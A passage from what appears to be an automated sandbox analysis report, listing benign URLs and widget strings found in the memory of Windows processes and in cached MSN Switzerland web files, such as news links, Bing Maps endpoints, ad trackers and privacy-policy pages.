48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: svchost.exe, 00000008.00000002.610199490.000002244F061000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.780038722.0000000003001000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000003.394092684.0000000003001000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584221057.000001E8CC0E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000008.00000002.610070711.000002244F010000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584221057.000001E8CC0E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000027.00000003.561364744.000001E8CC98B000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561483074.000001E8CC9CC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561528540.000001E8CC9AC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561262978.000001E8CC97A000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561228372.000001E8CC969000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561583760.000001E8CC969000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[2].htm.6.dr	String found in binary or memory: http://popup.taboola.com/german
Source: svchost.exe, 00000008.00000003.608975714.0000022449AB0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609831427.0000022449AB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.m
Source: svchost.exe, 00000008.00000003.608975714.0000022449AB0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609831427.0000022449AB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.
Source: svchost.exe, 00000008.00000003.608975714.0000022449AB0000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609831427.0000022449AB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/E
Source: {EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: imagestore.dat.6.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: Amcache.hve.26.dr	String found in binary or memory: http://upx.sf.net
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: svchost.exe, 0000000C.00000002.313031457.000002650A613000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.comr
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[2].htm.6.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22MS.News.W
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=273363&a=3064090&g=24940322
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: svchost.exe, 0000000A.00000002.776359886.0000025575440000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.313816759.000002650A66B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310455934.000002650A669000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.311802229.000002650A647000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.313308712.000002650A64E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.288500837.000002650A630000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000027.00000003.561364744.000001E8CC98B000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561483074.000001E8CC9CC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561528540.000001E8CC9AC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561262978.000001E8CC97A000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561228372.000001E8CC969000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561583760.000001E8CC969000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://doceree.com/.well-known/deviceStorage.json
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://doceree.com/us-privacy-policy/
Source: svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000002.313433897.000002650A65D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310609771.000002650A65B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.310543412.000002650A662000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.288500837.000002650A630000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://evorra.com/product-privacy-policy/
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[2].htm.6.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1638488543&rver=7.0.6730.0&am
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1638488544&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1638488543&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://msasg.visualstudio.com/Shared%20Data/_git/1DS.JavaScript?version=GBnubenja%2Fcustom-package
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://nextmillennium.io/privacy-policy/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://optimise-it.de/datenschutz
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: {EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat.4.dr, ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://secure.adnxs.com/clktrb?id=764680&t=1
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://silvermob.com/privacy
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://smartyads.com/privacy-policy
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: imagestore.dat.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AARlHk9.img?h=368&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://support.skype.com
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.313031457.000002650A613000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.288500837.000002650A630000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.311983863.000002650A657000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000002.313239402.000002650A63C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000002.313212745.000002650A639000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.288500837.000002650A630000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.313275180.000002650A643000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312008347.000002650A642000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.310976949.000002650A641000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.botman.ninja/privacy-policy
Source: svchost.exe, 00000027.00000003.561364744.000001E8CC98B000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561483074.000001E8CC9CC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561528540.000001E8CC9AC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561262978.000001E8CC97A000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561228372.000001E8CC969000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561583760.000001E8CC969000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000027.00000003.561364744.000001E8CC98B000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561483074.000001E8CC9CC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561528540.000001E8CC9AC000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561262978.000001E8CC97A000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561228372.000001E8CC969000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.561583760.000001E8CC969000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: imagestore.dat.6.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdV
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFA7B565ABAC8E893D.TMP.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ab-2025-gibt-es-einarmige-banditen-und-roulette-in-der-lokstadt
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/altkleider-nur-noch-in-stadtz%c3%bcrcher-sammelstellen/ar-AARos
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-provisorische-kantonsschule-auf-dem-irchel-kann-2024-starte
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/erste-best%c3%a4tigte-ansteckung-zwei-weitere-verdachtsf%c3%a4l
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-best%c3%a4tigt-ersten-omikron-fall-in-z%c3%bcrich/ar-AAR
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-verteidigt-finanzielle-beteiligung-am-kunstprojekt/ar-AA
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/lage-dramatisch-zugespitzt-%c3%b6v-in-winterthur-wird-teilweise
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/traurig-und-primitiv-rettungswagen-w%c3%a4hrend-einsatz-verspra
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wird-etwas-enger-im-bus-werden-die-kapazit%c3%a4t-aber-stemmen-
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrich-zahlt-f%c3%bcr-gr%c3%bcne-hausw%c3%a4nde/ar-AARnq3Z
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
